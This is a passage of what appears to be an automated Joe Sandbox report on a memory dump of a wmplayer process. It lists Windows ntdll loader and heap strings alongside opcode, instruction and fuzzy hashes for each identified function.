                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0332E6C6
                                              • HEAP: , xrefs: 0332E6B3
                                              • HEAP[%wZ]: , xrefs: 0332E6A6
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                              • API String ID: 0-1340214556
                                              • Opcode ID: af55821329f0b7308e0fb8cc901bd52498652268791b3d76f14d8ddef0374fb4
                                              • Instruction ID: 767b5e488cdc00bde248c18750fc489f0062c704f4afd23cba2c84b92246aa8f
                                              • Opcode Fuzzy Hash: af55821329f0b7308e0fb8cc901bd52498652268791b3d76f14d8ddef0374fb4
                                              • Instruction Fuzzy Hash: A6511635630784EFD712DBA8D985F6ABBF9FF05300F0802A9E5458B692D3B4E990CB10
                                              Strings
                                              • minkernel\ntdll\ldrinit.c, xrefs: 033482E8
                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 033482DE
                                              • Failed to reallocate the system dirs string !, xrefs: 033482D7
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-1783798831
                                              • Opcode ID: 7009fcfa9e0e1d2a3d035529cde01baf81811219600ccf282e9a1d80fd6e1365
                                              • Instruction ID: 276f69cb98d8eb45d474c08d58d0793257f74107fc57531845d9351f3ecd4bdd
                                              • Opcode Fuzzy Hash: 7009fcfa9e0e1d2a3d035529cde01baf81811219600ccf282e9a1d80fd6e1365
                                              • Instruction Fuzzy Hash: 3941C1B5564304AFC720FB24DCC5B5BB7ECAF44B50F084A2AB945DB290EBB0E840CB95
                                              Strings
                                              • @, xrefs: 0338C1F1
                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0338C1C5
                                              • PreferredUILanguages, xrefs: 0338C212
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                              • API String ID: 0-2968386058
                                              • Opcode ID: 6839f7c5439b87ebfe8fe75adec487f5839bb09b8f76e5dabde7deab459785b9
                                              • Instruction ID: 1fe1ed7c83ee229339f2c507c5c9967ebd4100cd49f701657727bf0e4621f9d1
                                              • Opcode Fuzzy Hash: 6839f7c5439b87ebfe8fe75adec487f5839bb09b8f76e5dabde7deab459785b9
                                              • Instruction Fuzzy Hash: 0C415C76E10319EBDF15EBD4C881FEEF7BCAB14700F14416AEA05A7290D7B49A448BA0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                              • API String ID: 0-1373925480
                                              • Opcode ID: b159d21392405f1533762d3ecb570aeaef14269fb26365a333185b196f126a35
                                              • Instruction ID: 5a24d3e8bd1297fb9d36a1a84c780acc7d99a026174ecc8814a504a48aace603
                                              • Opcode Fuzzy Hash: b159d21392405f1533762d3ecb570aeaef14269fb26365a333185b196f126a35
                                              • Instruction Fuzzy Hash: 0941ED35D007588FEB21DBE6C880BADBBB8FF45340F28449AD902EFB95DA749941CB11
                                              Strings
                                              • LdrpCheckRedirection, xrefs: 0335488F
                                              • minkernel\ntdll\ldrredirect.c, xrefs: 03354899
                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 03354888
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                              • API String ID: 0-3154609507
                                              • Opcode ID: 03b10a78e6a1c818332fe85b19e4c2796cb07f32210f17d1b7e4d424f5d0f447
                                              • Instruction ID: b2092893c93fdfd51f92903a2e47df3dc7883dd4858ccae08a5275570092f8bd
                                              • Opcode Fuzzy Hash: 03b10a78e6a1c818332fe85b19e4c2796cb07f32210f17d1b7e4d424f5d0f447
                                              • Instruction Fuzzy Hash: 4A41E432A107509FCB29CE5ADCC0E26BBE8AF49750F0A0559FC59DB311D331E880CB81
                                              Strings
                                              • SXS: %s() passed the empty activation context data, xrefs: 033429FE
                                              • Actx , xrefs: 033033AC
                                              • RtlCreateActivationContext, xrefs: 033429F9
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                              • API String ID: 0-859632880
                                              • Opcode ID: 183b7834a4a8b95195777d275643154eb58bafee2002e1ad80cc7e9bc64bc185
                                              • Instruction ID: 311d53042a8c9ea737153107b2ea9ed741fd1b064651269129ac02e3a863d5eb
                                              • Opcode Fuzzy Hash: 183b7834a4a8b95195777d275643154eb58bafee2002e1ad80cc7e9bc64bc185
                                              • Instruction Fuzzy Hash: 2E3103366103059FDB26DF58CCD1BA6B7A8AB44720F194869FD05EF285CB70E891C7A0
                                              Strings
                                              • DLL "%wZ" has TLS information at %p, xrefs: 03341A40
                                              • minkernel\ntdll\ldrtls.c, xrefs: 03341A51
                                              • LdrpInitializeTls, xrefs: 03341A47
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-931879808
                                              • Opcode ID: 36cad9333c350593d2827536c0f46175fd85a39e45d5b1e57824dbf6c58fd212
                                              • Instruction ID: 6111bc52654c20483909144fc06b63fee06fdddc36bf81112720e711fdea7fe6
                                              • Opcode Fuzzy Hash: 36cad9333c350593d2827536c0f46175fd85a39e45d5b1e57824dbf6c58fd212
                                              • Instruction Fuzzy Hash: 9131F63AE20708ABE710EB45CCE5FAE72BCFB45754F084159E905AB5D0D770BD448790
                                              Strings
                                              • BuildLabEx, xrefs: 0331130F
                                              • \Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0331127B
                                              • @, xrefs: 033112A5
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                              • API String ID: 0-3051831665
                                              • Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                              • Instruction ID: d7512d1fe83ef9ae7a57362ce882d5dfb53f4bf018cfbc8d404306d41b73d2f5
                                              • Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
                                              • Instruction Fuzzy Hash: AD318F76D00618ABDF15EF95CC84EEFBBBDEB84750F004825EA14AB5A0D730DA159B90
                                              Strings
                                              • LdrpInitializationFailure, xrefs: 033520FA
                                              • Process initialization failed with status 0x%08lx, xrefs: 033520F3
                                              • minkernel\ntdll\ldrinit.c, xrefs: 03352104
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                              • API String ID: 0-2986994758
                                              • Opcode ID: dea6aa41eb2fc21b12e18b2280a90dc246a82b3ea1e2da9d4114523b169d8ef3
                                              • Instruction ID: 35cfce6268243d7792011317ca92cb5926a70ef1ee694184cb22de353bbdbc0e
                                              • Opcode Fuzzy Hash: dea6aa41eb2fc21b12e18b2280a90dc246a82b3ea1e2da9d4114523b169d8ef3
                                              • Instruction Fuzzy Hash: 43F0C879A50348BFD714E64DDC86FDA776CEB40B54F140455FA00AB685D2B0F640CA51
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ___swprintf_l
                                              • String ID: #%u
                                              • API String ID: 48624451-232158463
                                              • Opcode ID: 547b868ce159a1a1bb1d0f558c75f2a83f03d4dcaeaa5413886c23cd6384e10d
                                              • Instruction ID: 5e9cff143eb0d51304cffc635c9d912e4409c668c4387a18c453cf6661c6e789
                                              • Opcode Fuzzy Hash: 547b868ce159a1a1bb1d0f558c75f2a83f03d4dcaeaa5413886c23cd6384e10d
                                              • Instruction Fuzzy Hash: A3716A76A1020A9FDB05DFA9C991FAEB7F8FF08704F144065E905EB251EA78ED41CB60
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@
                                              • API String ID: 0-149943524
                                              • Opcode ID: 2a076d0358dd90382ad2a19605f4420a8baacfb9af7f18b4258ef7f7fd03e7d2
                                              • Instruction ID: f52db55e57a254b4fd4f4f3bb88cc46777a4cf2cf9706b64d54edc233c883b8b
                                              • Opcode Fuzzy Hash: 2a076d0358dd90382ad2a19605f4420a8baacfb9af7f18b4258ef7f7fd03e7d2
                                              • Instruction Fuzzy Hash: C7329D745283129FC724CF18C48277EF7E5AF86748FA8891EF9859B290E774D884CB52
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: `$`
                                              • API String ID: 0-197956300
                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                              • Instruction ID: 09afd782b11fb8e9c9325e5c8431ffb0cbbe84daca2fff4711fab13c61763adf
                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                              • Instruction Fuzzy Hash: A2C1AD31204342DBEB24CF28CC81B6BFBE5AFC4718F184A2EF9958A290D775D945CB91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID: Legacy$UEFI
                                              • API String ID: 2994545307-634100481
                                              • Opcode ID: b65501f60686803000c29506cbeb9dc3ab37c558ad45ea9c6f9a98b4976bb69d
                                              • Instruction ID: 2e58a7878452a976fac64cf5490138edb3e683b08d311dd125b211b0a2cba5ba
                                              • Opcode Fuzzy Hash: b65501f60686803000c29506cbeb9dc3ab37c558ad45ea9c6f9a98b4976bb69d
                                              • Instruction Fuzzy Hash: B4615C76E103189FDB14DFA8C980BAEBBF9FB44740F14406DE559EB291D731A940CB90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: $$$
                                              • API String ID: 0-233714265
                                              • Opcode ID: 589ab4cbb0d9cbb325d5d65918a3afc23084ccf1036575840350e46806376d91
                                              • Instruction ID: 72c592cfbce176c2261ef53dd6005db910016352ad55464f3dbdd51d54f18bcb
                                              • Opcode Fuzzy Hash: 589ab4cbb0d9cbb325d5d65918a3afc23084ccf1036575840350e46806376d91
                                              • Instruction Fuzzy Hash: D161E075A2074AEFDB20DFA4D682BACF7B5FF04704F894069D5156F280CBB4A980CB80
                                              Strings
                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 032DA309
                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 032DA2FB
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                              • API String ID: 0-2876891731
                                              • Opcode ID: 4e90a366ddcc955013513a3a8a2fe4b0bca9c117ea16e86da4cbe0bb5dbc8d94
                                              • Instruction ID: a2a420c46ddba4feb628d827d6ac38ef8b5c4c46b9ec953a05f1a3c2bd6f2a7e
                                              • Opcode Fuzzy Hash: 4e90a366ddcc955013513a3a8a2fe4b0bca9c117ea16e86da4cbe0bb5dbc8d94
                                              • Instruction Fuzzy Hash: 28419E35A24649DBCB15CF59C880F6EB7B5FF86700F2884A9EC05DB6A1E375D980CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .Local\$@
                                              • API String ID: 0-380025441
                                              • Opcode ID: 5d37ebde1a44c7d932bc20ef12bc74ad28710534353093664cbb5f2a8b81472a
                                              • Instruction ID: a5e9a623d925ec741878a246e99ec38b56d639df8ef023d98b8db72037234860
                                              • Opcode Fuzzy Hash: 5d37ebde1a44c7d932bc20ef12bc74ad28710534353093664cbb5f2a8b81472a
                                              • Instruction Fuzzy Hash: F431B37A509304AFC711DF28C8D0A5BBBECFF85664F48096EF59587290DA30DD04CB92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: MUI
                                              • API String ID: 0-1339004836
                                              • Opcode ID: d15ea5b2f84bce1ae47a65b8e30839cb59221385024831b3f16a22c07e072b7b
                                              • Instruction ID: 9608be14ad7a2c1d862ae5c3bf73523902c9fc3ee3babf8a1d6454c615138f2c
                                              • Opcode Fuzzy Hash: d15ea5b2f84bce1ae47a65b8e30839cb59221385024831b3f16a22c07e072b7b
                                              • Instruction Fuzzy Hash: 3B826C75E206298FDB24CFA9C880BEDF7B5BF48710F18816AD859AB394D7709981CF50
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b4e18e9557e5945416c0c7544c9cf54376fd1d59f539f12e85d3e66427a5061e
                                              • Instruction ID: 663ce833664df7b9a82196b330093b0ca78d7d9b9c92a3fa2ce290d894a8872e
                                              • Opcode Fuzzy Hash: b4e18e9557e5945416c0c7544c9cf54376fd1d59f539f12e85d3e66427a5061e
                                              • Instruction Fuzzy Hash: B4A16D75A18742CFC715DF28C480A2ABBF9FF88304F14496EE5859B350E774E985CB92
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5d6a0900444f85a589fd05f66223630fb3469c0718a23d088d93ac305343c02c
                                              • Instruction ID: 6b8b7496c1098bc324cf94bbf780c1e292c094da074ada9f4db58e6732dee15c
                                              • Opcode Fuzzy Hash: 5d6a0900444f85a589fd05f66223630fb3469c0718a23d088d93ac305343c02c
                                              • Instruction Fuzzy Hash: 41413A79D10388AFCB20DFA9C8D1AAEFBB8FB48340F54816ED455A7251D730A940CF60
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: GlobalTags
                                              • API String ID: 0-1106856819
                                              • Opcode ID: 50390a5288599fc5bf03f3b46810bfd971deb7d8af975a4e88639e70d5e66bd0
                                              • Instruction ID: 6274a680f41e86beafcc0a25c0145d486dc6a4f4eafb27bf814fbb4ce210b802
                                              • Opcode Fuzzy Hash: 50390a5288599fc5bf03f3b46810bfd971deb7d8af975a4e88639e70d5e66bd0
                                              • Instruction Fuzzy Hash: BD718D75E0030ADFDF28CF98D9D26ADBBF5BF49710F18816AE805AB240E771A941CB50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                              • Instruction ID: 3c096023d8c9b0af49849fa9495262623b25453e98a365f9f236ee94d5401d3d
                                              • Opcode Fuzzy Hash: 32fdc9af89b0788a3bba97dbd317d7b10cd0208f20562fc1281393ba3f626ce3
                                              • Instruction Fuzzy Hash: A6616B75D11219AFDF21DF99D880BAEFBB4FF85B10F144569E810EB290D7709A80CB60
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                              • Instruction ID: 226041a8b4bd9fb9e0a6c9b04896033be5e0df4b02f965dae1df8acd55162d37
                                              • Opcode Fuzzy Hash: 8281e956446473216ed512d18dfae26456dfb93296f0f4edbd2d8efa18977056
                                              • Instruction Fuzzy Hash: AA517776614745EFEB21DF54CC80F6BB7E8FB84754F080929BA809B290D7B4E914CB92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: EXT-
                                              • API String ID: 0-1948896318
                                              • Opcode ID: 1ff26270e297a78ea9d55410a307f2f368177a2d15977fc6411321ebddbe9538
                                              • Instruction ID: 9c802c07ef11c5b6293c17fc007a73d9dd3aa59aaa4a833f8b94b7097cf16321
                                              • Opcode Fuzzy Hash: 1ff26270e297a78ea9d55410a307f2f368177a2d15977fc6411321ebddbe9538
                                              • Instruction Fuzzy Hash: 5641F3765283129BD710DB74D882B6FB7E8AF88704F860A2DF584EB140E7B4D984C797
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: PreferredUILanguages
                                              • API String ID: 0-1884656846
                                              • Opcode ID: 00cfd934d5db357641dc7392fc7a9fa015c95c45495c42653a625dbf22af2fba
                                              • Instruction ID: 7459fb986b91a2671cf5a6055804d230f669da88a32ff43525cfbebd587158bc
                                              • Opcode Fuzzy Hash: 00cfd934d5db357641dc7392fc7a9fa015c95c45495c42653a625dbf22af2fba
                                              • Instruction Fuzzy Hash: 4141A136D1031AABDF11EB94CC80AEEF7BDAF45750F19016AE911AB250D6F0DE40C7A0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: BinaryHash
                                              • API String ID: 0-2202222882
                                              • Opcode ID: 1652b9f2b30334e98d9cebc2eccac002d039c7555b351d4e28ea2a3ddffb36f4
                                              • Instruction ID: 0826118edf55420ce01a484400d86542859cff98a7616dcbedeb1bfe3141f902
                                              • Opcode Fuzzy Hash: 1652b9f2b30334e98d9cebc2eccac002d039c7555b351d4e28ea2a3ddffb36f4
                                              • Instruction Fuzzy Hash: 2D4100B5D0162CAADB21DB50CCC5FDEB7BCAB45714F0045A5AA08AB150DB70AE89CFA4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: verifier.dll
                                              • API String ID: 0-3265496382
                                              • Opcode ID: 59f9d8fcea5270ba920ccf6db8923e08880a6f95bc912e29bee2a0df2e52edb1
                                              • Instruction ID: ceba4c301b69cb131cceee910faff9e20906d985a12ba3ba30a0d70b84201718
                                              • Opcode Fuzzy Hash: 59f9d8fcea5270ba920ccf6db8923e08880a6f95bc912e29bee2a0df2e52edb1
                                              • Instruction Fuzzy Hash: DA316176A10301DFDB24DF29D8D0F26B6E9EB49712F598479F905DF281E7719C808790
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: kLsE
                                              • API String ID: 0-3058123920
                                              • Opcode ID: 50395fd7eb2ce792c95ddece0c205044d6907d114aa08d8c6dec44035d18d449
                                              • Instruction ID: cbd35f9fd94a3f60fd45310f145f1e699319772ceb3b895dd1a3227bf6e5e8a2
                                              • Opcode Fuzzy Hash: 50395fd7eb2ce792c95ddece0c205044d6907d114aa08d8c6dec44035d18d449
                                              • Instruction Fuzzy Hash: 844149315213518BE731FB64ECCAB79BBA8AB40724F1C0529EC509E1C9CBBCA4C5C790
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Flst
                                              • API String ID: 0-2374792617
                                              • Opcode ID: 8e9ed2146eae3cffbf46d36f63712de1b8dd0ce6d7744cc5eb77939195d0aa5c
                                              • Instruction ID: 4775dcc4a49a80f3e962bd1f8e24b1539d01b1d2bf647657bd24d21a0188ca86
                                              • Opcode Fuzzy Hash: 8e9ed2146eae3cffbf46d36f63712de1b8dd0ce6d7744cc5eb77939195d0aa5c
                                              • Instruction Fuzzy Hash: 70419AB96053019FC314CF18C5D0A26FBE8EB49B24F18856EE459CF281EB71D982CB92
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: L4CwL4Cw
                                              • API String ID: 0-1654103815
                                              • Opcode ID: e8c666214aff2c0d767c3e5e3895e2fee8071ca2b5dd1d3811ba6995d65a2262
                                              • Instruction ID: 8bdb7b5bc28e98da868a97cb5d538d98ecc6b8153091afdd4e3f8cee307c0611
                                              • Opcode Fuzzy Hash: e8c666214aff2c0d767c3e5e3895e2fee8071ca2b5dd1d3811ba6995d65a2262
                                              • Instruction Fuzzy Hash: C421D67A6317909FC322EF188840B5ABBB8FB84B50F15052DE5559F340D7B0EC84CB90
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx
                                              • API String ID: 0-89312691
                                              • Opcode ID: de6fa1abbd1ee365998a642a195bca63e935fceaaa129f79cf37bcb4a9184da6
                                              • Instruction ID: ce610ac7817455182388dadc487b1d777d2247493cdc5aa1cc28869951714b23
                                              • Opcode Fuzzy Hash: de6fa1abbd1ee365998a642a195bca63e935fceaaa129f79cf37bcb4a9184da6
                                              • Instruction Fuzzy Hash: C911B9303345038BEB24C91DA850636B399EB8B655F3C812BE492CB790D7F2DCC18780
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrCreateEnclave
                                              • API String ID: 0-3262589265
                                              • Opcode ID: 1254498780d84752cd71791f980b1c94e00db63b6983a72054839abf6e461273
                                              • Instruction ID: c9e676310655349e391c1c55fc0b9f800a0e231a282c1569b28c31e6fa8a40a2
                                              • Opcode Fuzzy Hash: 1254498780d84752cd71791f980b1c94e00db63b6983a72054839abf6e461273
                                              • Instruction Fuzzy Hash: 2E2138B19283449FC310DF1AC885A9BFBE8FBD5B50F004A1EF99097250DBB09544CB92
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe23e4ac6ed614445a54a66e7baaa0721307e5f9d1e8968a3937aa634c142d9c
                                              • Instruction ID: 5fb0f02079a5fdd20da0a4cb33093cff4550ee9e3bd34ed4c6f0b260e85fce6e
                                              • Opcode Fuzzy Hash: fe23e4ac6ed614445a54a66e7baaa0721307e5f9d1e8968a3937aa634c142d9c
                                              • Instruction Fuzzy Hash: A042B375A006268FDB18CF59C8D1ABEFBB6FF88314B28855DD552AB341D734E842CB90
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.2321922412.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032A0000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_32a0000_wmplayer.jbxd
                                              Similarity
